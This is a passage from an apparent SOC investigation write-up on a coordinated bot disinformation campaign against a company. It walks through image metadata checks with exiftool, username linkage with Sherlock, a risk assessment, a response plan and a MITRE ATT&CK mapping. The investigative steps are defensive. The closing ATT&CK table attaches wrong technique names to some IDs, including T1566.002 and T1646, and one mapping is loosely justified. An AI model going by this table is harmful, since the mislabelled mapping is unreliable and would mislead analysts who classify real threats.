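        print(f"{mark} {r['handle']:<20} {r['score']}  {', '.join(r['signals'])}")
```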
Step 4: Visual and Metadata Inspection
Media Forensics:
• Downloaded image from @realfacts_truth and @whistle_truther.
exiftool profile_image.jpg
Output:
Create Date: 2021:06:02 14:10:25
Software: Adobe Photoshop Express
Device: Huawei Nova 3i
Reverse Image Search:
• Matches 3 free stock image sites.
• Also used by fake Telegram scam group account.
Step 5: Cross-Platform Linkage
Use Sherlock or manual search to check username reuse.
sherlock whistle_truther
Findings:
• Same alias on Telegram, Reddit and GitHub.
• Posts in hacking forums with anti-company sentiment.
Step 6: Risk Assessment and Reporting
Metric Value
Account Authenticity Low (recent, no history, same creation date)
Coordination Probability High (identical posting pattern, content)
Risk to Organisation Medium to High (reputation damage + misinformation spread)
Network Indicators 4 Accounts, 2 reused images, 1 phishing link
Step 7: SOC Action Plan
Step                  | Action
Reporting             | Submitted to Twitter/X Abuse with screenshots
IOC Ingestion         | All usernames, hashtags and URLs added to MISP and SIEM
Reputation Protection | Sent counter-message campaign with verified company post
Monitoring Initiated  | Alert rule for #CompanyXFraud and new accounts with similar bios
Risk Wiki Entry       | New entry: "Coordinated Bot Disinfo Campaign – 2025-08-05"
MITRE ATT&CK Mapping
Technique ID | Technique Name                            | Reason
T1585.001    | Establish Accounts: Social Media Accounts | Fake accounts created to spread misinformation
T1587.001    | Develop Capabilities: Malware             | Accounts linked to phishing link sharing
T1566.002    | Spearphishing via Social Media            | Targeting users via fake DMs
T1646        | Manipulate Content: Social Media Posts    | Fabricating trending campaigns to discredit company